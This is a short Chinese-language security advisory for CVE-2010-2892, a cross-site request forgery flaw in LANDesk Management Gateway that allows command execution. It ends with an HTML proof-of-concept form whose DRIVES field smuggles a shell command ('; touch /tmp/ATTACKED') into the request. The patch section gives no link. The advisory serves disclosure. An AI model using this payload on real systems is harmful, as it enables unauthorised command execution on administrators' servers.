BUGTRAQ ID: 44781
CVE ID: CVE-2010-2892
Landesk管理套件是一款网络管理系统,可控制桌面,服务器和移动设备等。
Landesk没有正确地验证提交特制请求的用户来源。如果管理员使用攻击者的浏览器登录到了设备,攻击者就可以以gsbadmin用户权限执行任意代码。
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s
临时解决方法:
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
/-----
<head><title>LANDesk PoC</title></head>
<body>
<form method="post" action="https://[server]/gsb/drivers.php">
<input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
<input type="text" name="SECONDTIME" value="1">
<input type="text" name="ACTION" value="getupdate">
<input type="submit" value="Attack!">
</form>
</body>
</html>
-----/